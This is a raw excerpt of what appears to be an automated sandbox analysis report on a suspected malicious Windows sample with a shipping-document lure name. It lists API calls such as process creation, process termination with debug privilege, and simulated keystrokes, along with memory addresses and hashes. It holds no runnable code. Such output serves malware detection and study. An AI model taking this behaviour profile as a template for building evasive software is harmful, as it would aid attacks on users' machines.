• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 009AF6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009AF848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009AF86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009AF8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009AF8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009AFA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009AFA7C
• CloseHandle.KERNEL32(?), ref: 009AFAAB
• CloseHandle.KERNEL32(?), ref: 009AFB22
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00993697,?), ref: 0099468B
  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00993697,?), ref: 009946A4
  • Part of subcall function 00994A31: GetFileAttributesW.KERNEL32(?,0099370B), ref: 00994A32
• lstrcmpiW.KERNEL32(?,?), ref: 00994D40
• _wcscmp.LIBCMT ref: 00994D5A
• MoveFileW.KERNEL32(?,?), ref: 00994D75
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009B86FF
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0096C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0096C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0096C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0096C370
• DestroyIcon.USER32(00000000), ref: 0096C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0096C39C
• DestroyIcon.USER32(?), ref: 0096C3AB
  • Part of subcall function 009BA4AF: DeleteObject.GDI32(00000000), ref: 009BA4E8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
  • Part of subcall function 0098A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0098A84C
  • Part of subcall function 0098A82C: GetCurrentThreadId.KERNEL32 ref: 0098A853
  • Part of subcall function 0098A82C: AttachThreadInput.USER32(00000000,?,00989683,?,00000001), ref: 0098A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0098968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009896AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009896AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009896B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009896D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009896D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009896E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009896F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009896FB
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0098853C,00000B00,?,?), ref: 0098892A
• HeapAlloc.KERNEL32(00000000,?,0098853C,00000B00,?,?), ref: 00988931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0098853C,00000B00,?,?), ref: 00988946
• GetCurrentProcess.KERNEL32(?,00000000,?,0098853C,00000B00,?,?), ref: 0098894E
• DuplicateHandle.KERNEL32(00000000,?,0098853C,00000B00,?,?), ref: 00988951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0098853C,00000B00,?,?), ref: 00988961
• GetCurrentProcess.KERNEL32(0098853C,00000000,?,0098853C,00000B00,?,?), ref: 00988969
• DuplicateHandle.KERNEL32(00000000,?,0098853C,00000B00,?,?), ref: 0098896C
• CreateThread.KERNEL32(00000000,00000000,00988992,00000000,00000000,00000000), ref: 00988986
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                • String ID:
                                                                • API String ID: 1957940570-0
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                • API String ID: 0-572801152
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Variant$ClearInit$_memset
                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                • API String ID: 2862541840-625585964
                                                                APIs
                                                                  • Part of subcall function 0098710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?,?,00987455), ref: 00987127
                                                                  • Part of subcall function 0098710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987142
                                                                  • Part of subcall function 0098710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?,?), ref: 00987150
                                                                  • Part of subcall function 0098710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00987044,80070057,?), ref: 00987160
                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009A9806
                                                                • _memset.LIBCMT ref: 009A9813
                                                                • _memset.LIBCMT ref: 009A9956
                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009A9982
                                                                • CoTaskMemFree.OLE32(?), ref: 009A998D
                                                                Strings
                                                                • NULL Pointer assignment, xrefs: 009A99DB
                                                                Similarity
                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                • String ID: NULL Pointer assignment
                                                                • API String ID: 1300414916-2785691316
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009B6E24
                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 009B6E38
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009B6E52
                                                                • _wcscat.LIBCMT ref: 009B6EAD
                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 009B6EC4
                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009B6EF2
                                                                Strings
                                                                Similarity
                                                                • API ID: MessageSend$Window_wcscat
                                                                • String ID: SysListView32
                                                                • API String ID: 307300125-78025650
                                                                APIs
                                                                  • Part of subcall function 00993C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00993C7A
                                                                  • Part of subcall function 00993C55: Process32FirstW.KERNEL32(00000000,?), ref: 00993C88
                                                                  • Part of subcall function 00993C55: CloseHandle.KERNEL32(00000000), ref: 00993D52
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AE9A4
                                                                • GetLastError.KERNEL32 ref: 009AE9B7
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AE9E6
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 009AEA63
                                                                • GetLastError.KERNEL32(00000000), ref: 009AEA6E
                                                                • CloseHandle.KERNEL32(00000000), ref: 009AEAA3
                                                                Strings
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 2533919879-2896544425
                                                                APIs
                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00993033
                                                                Strings
                                                                Similarity
                                                                • API ID: IconLoad
                                                                • String ID: blank$info$question$stop$warning
                                                                • API String ID: 2457776203-404129466
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00994312
                                                                • LoadStringW.USER32(00000000), ref: 00994319
                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0099432F
                                                                • LoadStringW.USER32(00000000), ref: 00994336
                                                                • _wprintf.LIBCMT ref: 0099435C
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0099437A
                                                                Strings
                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00994357
                                                                Similarity
                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                • API String ID: 3648134473-3128320259
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • GetSystemMetrics.USER32(0000000F), ref: 009BD47C
                                                                • GetSystemMetrics.USER32(0000000F), ref: 009BD49C
                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 009BD6D7
                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009BD6F5
                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009BD716
                                                                • ShowWindow.USER32(00000003,00000000), ref: 009BD735
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 009BD75A
                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 009BD77D
                                                                Similarity
                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                • String ID:
                                                                • API String ID: 1211466189-0
                                                                APIs
                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000), ref: 00932ACF
                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00932B17
                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000), ref: 0096C21A
                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000), ref: 0096C286
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 009970DD
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00997114
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00997130
                                                                • _memmove.LIBCMT ref: 0099717E
                                                                • _memmove.LIBCMT ref: 0099719B
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009971AA
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009971BF
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 009971DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 256516436-0
                                                                • Opcode ID: bb7e87b0a00e922c797e4a84b95c76602bd6487321dc27cf823a05e21bbab1b3
                                                                • Instruction ID: e84a1bdf4c2007f5376a9fdd9b686af52f2e01edc3c8da61c0def13e4fba2ca9
                                                                • Opcode Fuzzy Hash: bb7e87b0a00e922c797e4a84b95c76602bd6487321dc27cf823a05e21bbab1b3
                                                                • Instruction Fuzzy Hash: 93317C31A04205EBCF10DFA9DD85AAEB7B8EF85311F2441A5FD04AB256DB309E14DBA0
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 009B61EB
                                                                • GetDC.USER32(00000000), ref: 009B61F3
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B61FE
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 009B620A
                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009B6246
                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009B6257
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009B902A,?,?,000000FF,00000000,?,000000FF,?), ref: 009B6291
                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009B62B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                • String ID:
                                                                • API String ID: 3864802216-0
                                                                • Opcode ID: 4cbc5f791a3c6ff45279eb0291e46b6ee9217902f1a431b047eb6065cdcd8ea4
                                                                • Instruction ID: 1c76bca6187e39872ef1f174e119ece7e887647f8ba18c54b6e2d5b4c4a4b124
                                                                • Opcode Fuzzy Hash: 4cbc5f791a3c6ff45279eb0291e46b6ee9217902f1a431b047eb6065cdcd8ea4
                                                                • Instruction Fuzzy Hash: 22319F72114214BFEF108F54CD9AFEA3BADEF49765F040165FE08DA191C6759C41CB60
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memcmp
                                                                • String ID:
                                                                • API String ID: 2931989736-0
                                                                • Opcode ID: 951382a7b7baf73c70595a030a68b1505d26c8ba7d667ee37631a9edc5951a4a
                                                                • Instruction ID: 949a901247f8c4c63b3757418a231345e1c0e82cad2ac602c1278201d3e1d461
                                                                • Opcode Fuzzy Hash: 951382a7b7baf73c70595a030a68b1505d26c8ba7d667ee37631a9edc5951a4a
                                                                • Instruction Fuzzy Hash: 0521D161A413057BF204BB169D42FBF775C9E9138CF0C4025FD0596743EB28DE1583A2
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                • _wcstok.LIBCMT ref: 0099EC94
                                                                • _wcscpy.LIBCMT ref: 0099ED23
                                                                • _memset.LIBCMT ref: 0099ED56
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                • String ID: X
                                                                • API String ID: 774024439-3081909835
                                                                • Opcode ID: 925e6f8891c102f70db8da8c2ca2a2dfdb19ad37e9b65ba44b200a59222fae48
                                                                • Instruction ID: bbaa2f038404ca6a8340dfe6b2d7459b3a3c0edc3c4cd6bbe7f328f87c76e5c7
                                                                • Opcode Fuzzy Hash: 925e6f8891c102f70db8da8c2ca2a2dfdb19ad37e9b65ba44b200a59222fae48
                                                                • Instruction Fuzzy Hash: 41C15D716083419FCB64EF68C885B6AB7E4EF85310F14492DF8999B2A2DB70EC45CF42
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 71b0139f7b3df7e6a452e7f3c5362b76a02925f34e26e8c9c3473a79d345f729
                                                                • Instruction ID: 59df5c8f7aeda749912a2ce78573f2989cc3bbf231dad94d1f25098e8bd5ad01
                                                                • Opcode Fuzzy Hash: 71b0139f7b3df7e6a452e7f3c5362b76a02925f34e26e8c9c3473a79d345f729
                                                                • Instruction Fuzzy Hash: 1C715931904109EFCB04DF98CC89ABEBB79FF85324F148259F915AA261D734AA51CFA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d90c40f9be566589947a19bb6543628eea245a58eabb9e477b73183e457d9d9
                                                                • Instruction ID: 82e2df1bd9ff4de023261103328a051206e63812eb052e9e31514271cd0a155b
                                                                • Opcode Fuzzy Hash: 1d90c40f9be566589947a19bb6543628eea245a58eabb9e477b73183e457d9d9
                                                                • Instruction Fuzzy Hash: B1619D72208300ABC710EB64CC96F6BB7A8AFD5714F544A1DF9569B2D2DA70AD04CB92
                                                                APIs
                                                                • IsWindow.USER32(00E85388), ref: 009BB3EB
                                                                • IsWindowEnabled.USER32(00E85388), ref: 009BB3F7
                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009BB4DB
                                                                • SendMessageW.USER32(00E85388,000000B0,?,?), ref: 009BB512
                                                                • IsDlgButtonChecked.USER32(?,?), ref: 009BB54F
                                                                • GetWindowLongW.USER32(00E85388,000000EC), ref: 009BB571
                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009BB589
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                • String ID:
                                                                • API String ID: 4072528602-0
                                                                • Opcode ID: 61f3bc1cda74f58ba00b9c7d3bec1a7173741b195cb6fb9b5739c9e67af5bca4
                                                                • Instruction ID: 1712071644c642480ad316e25451d12f529d99ec32fd8382e083ab9d0df64207
                                                                • Opcode Fuzzy Hash: 61f3bc1cda74f58ba00b9c7d3bec1a7173741b195cb6fb9b5739c9e67af5bca4
                                                                • Instruction Fuzzy Hash: 94719B34605204EFDB349F54CAA4FFABBAAFF49320F144159FA46972A2C7B5A840DB50
                                                                APIs
                                                                • _memset.LIBCMT ref: 009AF448
                                                                • _memset.LIBCMT ref: 009AF511
                                                                • ShellExecuteExW.SHELL32(?), ref: 009AF556
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                • GetProcessId.KERNEL32(00000000), ref: 009AF5CD
                                                                • CloseHandle.KERNEL32(00000000), ref: 009AF5FC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                • String ID: @
                                                                • API String ID: 3522835683-2766056989
                                                                • Opcode ID: c7f2e3e79d27f49f81e61cb3b7e53531f86f6e2866dbbb88b80c6188a49f41c0
                                                                • Instruction ID: 08a624b34805dfe5b548a16f285570146db88b7dfaee3ad3e3019d98aa004b85
                                                                • Opcode Fuzzy Hash: c7f2e3e79d27f49f81e61cb3b7e53531f86f6e2866dbbb88b80c6188a49f41c0
                                                                • Instruction Fuzzy Hash: 57618F75A006199FCB14DFA8C895AAEFBF5FF89310F148469E859AB351CB30AD41CF90
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00990F8C
                                                                • GetKeyboardState.USER32(?), ref: 00990FA1
                                                                • SetKeyboardState.USER32(?), ref: 00991002
                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00991030
                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0099104F
                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00991095
                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009910B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: fbed19db85b52dd3621cd805fc5d51edd7e32f8eb07acbc7981bd9ac42a592c2
                                                                • Instruction ID: 6eaa128c3da0c33bc85219e11a8360d0691ffcb15cff369630181927ccd2b3be
                                                                • Opcode Fuzzy Hash: fbed19db85b52dd3621cd805fc5d51edd7e32f8eb07acbc7981bd9ac42a592c2
                                                                • Instruction Fuzzy Hash: 6351F4605087D63EFF36463C8C15BBABEAD6B46304F088589E1E4458D3C2DAEDC9D761
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 00990DA5
                                                                • GetKeyboardState.USER32(?), ref: 00990DBA
                                                                • SetKeyboardState.USER32(?), ref: 00990E1B
                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00990E47
                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00990E64
                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00990EA8
                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00990EC9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: 5dc2ce9f550d156d29e82677cbd8cd97fb2e8acd54d28b5af9fcb1fe5026d4b7
                                                                • Instruction ID: 15fab28e8ad2898e2c837c5b235bbed14cced0569ec6d60e53fe31e5252b568a
                                                                • Opcode Fuzzy Hash: 5dc2ce9f550d156d29e82677cbd8cd97fb2e8acd54d28b5af9fcb1fe5026d4b7
                                                                • Instruction Fuzzy Hash: 0451E5A05187D53DFF3297788C55B7A7FAD6B86300F088989F1E4468C2C395AD98E760
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
